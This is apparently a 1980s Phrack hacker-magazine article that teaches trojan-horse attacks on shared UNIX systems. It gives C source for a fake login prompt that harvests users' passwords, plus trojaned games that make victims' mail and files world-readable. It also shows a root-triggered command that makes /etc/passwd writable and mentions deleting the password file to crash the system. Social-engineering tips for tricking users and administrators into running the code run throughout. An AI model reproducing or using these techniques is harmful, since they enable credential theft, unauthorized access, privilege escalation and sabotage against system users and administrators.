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One, Issue 7, Phile #7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ooting Shark of Tiburon Systems / R0DENTZWARE - 6/2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X Security" is an oxymoron.  It's an easy system to br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ack (most UNIX systems don't hang up after x number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, and there are a number of default logins, such as root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and uucp).  Once you're in the system, you can easi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ts knees (see my previous Phrack article, "UNIX Nasty Tric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know a little 'C', you can make the system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ly eliminate the security barriers to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reading anybody's files, etcetera.  This file will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ys by presenting 'C' code that you can implem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working account on a UNIX system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robust version of UNIX (such as 4.2bsd or AT&amp;T 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real machine (a PDP/11, VAX, Pyramid, etc.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.  If you go to school and have an account on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at will do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as inspired an article in the April, '86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ntitled "Making UNIX Secure."  In the article, the autho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provide this information in a way that, we hope, is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yet stops short of being a 'cookbook for crackers.'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tentionally omitted details."  I am fo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article, giving explicit examples of the methods they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related note:  Somewhere there's a dude running a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"Lord British" (not THE Lord British...).  This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B:  "Fuck off and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ne:  Fishing F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mplement this with only a minimal knowledge of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However, you need access to a terminal that many people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ab at your school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 onto a typical UNIX system, you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uron Systems 4.2bsd / System V (sh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    (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'm giving you here simulates a logon sequ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a terminal and then leave.  Some unknowing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lk up and enter their login and password.  I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s, then "login incorrect" is printed, then the f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log in again.  The second time it's the real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person succeeds and they are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tem, put the following code into a file called 'horse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the first 8 lines to fit your system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de Begins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what a 'C' comment looks like.  You can leave them o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's are like macros you can use for configur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TEM "\n\nTiburon Systems 4.2bsd UNIX (shark)\n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above string should be made to look like the messag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prints when ready.  Each \n represen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IN  "login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above is the login prompt.  You shouldn't hav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you're running some strange version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SSWORD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above is the password promp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numerical value assigned to WAIT is the delay you g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ssword:" and before "login incorrect."  Change it (0 =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delay, 5 = LONG delay) so it looks like your system'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ism is the key here - we don't want our targe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ORRECT "Login incorrect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he above so it is what your system says whe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in is given.  You shouldn't hav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NAME "stu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NAME is the name of the file that the hacked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put into automatically.  'stuff' is a perfectly go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n't change the rest of the program unless there is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you know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name[10], passwor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SIGINT,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LO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[^\n]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[^\n]",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( fp = fopen(FILENAME,"a") ) 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printf(fp,"login %s has password %s\n",name,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INCOR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ource Ends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as I said, enter the above and configure it so it loo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system's login sequence.  To compile thi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rse.c' type the following two lines: (don't type the %'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ampl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c horse.c -lcurses -l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v a.out h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working object code in a file called 'horse'. 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n't look like your systems logon sequence, re-edit ho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compile it.  When you're ready to put the program into us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and call it 'trap' or something.  'trap' should hav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           (this runs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      (this runs the real log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'trap'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trap            (again, don't type the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away from your termi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run it successfully a few times, check you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(or whatever you decided to call it). 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john has passwor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y has password sme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wn these passwords, then delete this file (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ng if the superuser se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for best results your terminal should be set to time-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of non-use - that way, your hors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dle for 14 hours if nobody uses the terminal you ra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jects can be run on a remote system, such as the V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you've hacked into, or Dartmouth's UNIX syste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require a little knowledge of the 'C' language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thing for UNIX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wo:  Reading Anybod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body runs a program, they're the owner of the proces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program can do anything they would do, such as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irectory or making a file of theirs availa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save old mail they get on a UNIX system, it'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mbox in their home directory.  This file can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ut is usually impossible for anybody but the file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Here is a short program that will unlock (i.e. chmod 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 anybody on the system read, write or execute) the m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who runs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de Begins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K#�^�char buf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getpwnam(getlogi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buf,"%s/%s",p-&gt;pw_dir,"m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access(buf,0) &gt; -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buf,"chmod 777 %s/%s",p-&gt;pw_dir,"m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de Ends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question is:  How do I get my target to run this progra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you're on has a public-messages type of th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bsd, type 'msgs') you can advertise your program there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de in another program - find a utility or gam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gazine like UNIX WORLD and modify it and do the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's real thing.  So if you have a program called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modified it to unlock the mbox file of the us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ic-tac-toe with him, advertise "I have a new tic-tac-to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at you should all try.  It's in my directory.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eans of telling everybody on the system via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just send mail to the specific people you want to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real program to modify, just take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is line between the two '}' lines at the end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Error opening tic-tac-toe data file.  Sorry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uns, it will print the above error messag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"Heh, that dude doesn't know how to write a simple tic-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program!" but the joke's on him - you can now read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specific file in a user's directory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say it's called "secret") just throw together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access("secret",0) &gt; -1 ) system("chmod 777 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'talk' or 'write' to him and act like Joe Loser: "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uper_star_wars, will you try it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imagination.  Think of a command you'd lik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Then put it inside a system() call in a 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m into running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neat way of using the abov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ree: Become the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you can get people to run.  Put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!strcmp(getlogin(),"root") ) system("whatever you wa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s to see if the root login is running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, you can have him execute any shell command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mod 666 /etc/passw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 is the system's password file.  The root ow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rmally, everyone can read it (the passwords are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root can write to it.  Take a look at it and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f you don't know already.  This command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now write to the file - i.e. create unlimited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mod 666 /etc/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yourself to some high-access groups, you can op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mod 666 /usr/lib/uucp/L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is file on your system if it is on the uucp n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ialups and passwords to other systems on the net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ucp administrator can read it.  Find out who own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him to unknowingly execute a program to unlock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 /etc/passw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get the root to execute this command,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file will be removed and the system will go dow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up for some time to come.  This is very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go about adding a trojan hors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re are some rules you should follow.  If the hidd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major (such as unlocking the user's mbox or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iles or something) this program shouldn't b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running a lot (such as a popular computer game)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iscover that their files are public acces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discovered quite easily.  Save this purpose for a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a game you're in the process of writing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dividual people to run via mail or 'chatting' with them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is 'test' program can bomb or print a phony error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its task, and you will just tell the person "well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more work", wait until they log off, and then rea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irs that you've unlocked.  If your trojan hors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is to catch a specific user running it -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r other high-powered user - you can put the cod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that will be run a lot by various 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cation will remain dormant until he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source to 'star trek' or whatever in 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 and convert something from pascal.  It can't hur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it's a great language.  We've just seen what it can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Once you've caught the root (i.e. you can now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tc/passwd file) remove the spurious code from your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'll never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if you have any questions or comments or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ch at me, call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922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megs, IBM warezzz, 2400 baud, Phrack sub-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British, I *dare* yo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